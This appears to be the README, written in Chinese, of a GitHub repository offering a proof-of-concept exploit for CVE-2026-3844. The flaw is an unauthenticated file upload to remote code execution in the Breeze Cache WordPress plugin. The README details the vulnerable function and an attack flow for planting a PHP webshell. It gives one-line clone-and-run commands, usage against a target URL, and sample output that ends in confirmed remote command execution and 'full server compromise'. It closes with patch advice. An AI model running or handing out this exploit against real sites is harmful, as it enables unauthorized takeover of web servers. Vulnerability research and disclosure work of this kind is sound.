针对 CVE-2026-3844 的 PoC 漏洞利用代码,这是 WordPress Breeze 插件中一个可导致 RCE 的严重未认证文件上传漏洞。
CVE-2026-3844 是 Breeze Cache WordPress 插件(由 Cloudways 开发)中的一个严重未认证任意文件上传漏洞,影响直至并包括 2.4.4 的所有版本。
本仓库提供了一个概念验证(PoC)漏洞利用代码(CVE-2026-3844.py),用于授权的安全研究、渗透测试和负责任披露。
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2026-3844 |
| 插件 | Breeze Cache(由 Cloudways 开发) |
| 受影响版本 | 所有版本 ≤ 2.4.4 |
| 已修补版本 | Breeze 2.4.5+ |
| 漏洞类型 | CWE-434 — 危险类型文件的无限制上传 |
| CVSS v3.1 评分 | 9.8(严重) |
| CVSS v2.0 评分 | 10.0(严重) |
| CVSS 向量 | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 攻击向量 | 网络(远程) |
| 认证要求 | ❌ 无 — 无需认证 |
| 利用条件 | 必须启用“Host Files Locally – Gravatars”(默认禁用) |
| 影响 | 机密性:高 · 完整性:高 · 可用性:高 |
| 发布时间 | 2026-04-23 |
| 来源 | Wordfence / NVD / MITRE |
| PoC | Tausif Zaman |
WordPress 的 Breeze Cache 插件在启用 “Host Files Locally – Gravatars” 功能时,会获取远程 Gravatar 图像并存储在本地。class-breeze-cache-cronjobs.php(第 89–119 行)中的易受攻击函数 fetch_gravatar_from_remote 对所获取的远程内容不进行任何文件类型或扩展名验证。
class-breeze-cache-cronjobs.php
└── fetch_gravatar_from_remote() ← ❌ No file type validation
└── Saves remote content directly to disk
└── Attacker controls → uploads .php webshell → RCE
Attacker (Unauthenticated)
│
▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
│
▼
Plugin fetches & saves the .php file without validation
│
▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
│
▼
Attacker accesses webshell → Full RCE achieved
若成功利用,攻击者可以:
requests 库# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3 CVE-2026-3844.py
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
python3 CVE-2026-3844.py
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]
CVE-2026-3844 — Breeze Cache WordPress Plugin Arbitrary File Upload PoC
optional arguments:
-h, --help Show this help message and exit
-u URL, --url URL Target URL (e.g. https://target.com)
-t TIMEOUT Request timeout in seconds (default: 10)
-o OUTPUT Save webshell path to output file
-v, --verbose Enable verbose/debug output
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
╔══════════════════════════════════════════════════════╗
║ CVE-2026-3844 | Breeze Cache WP RCE ║
║ Researcher: tausifzaman.online ║
╚══════════════════════════════════════════════════════╝
[*] Target : https://vulnerable-site.com
[*] CVE : CVE-2026-3844
[*] Plugin : Breeze Cache ≤ 2.4.4
[*] Type : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...
[+] Breeze Cache plugin detected!
[+] "Host Files Locally – Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!
[+] Command output (id):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.
将 Breeze Cache 更新至 2.4.5 或更高版本 —— 这是唯一完整的修复方案。
# WordPress CLI — update Breeze plugin immediately
wp plugin update breeze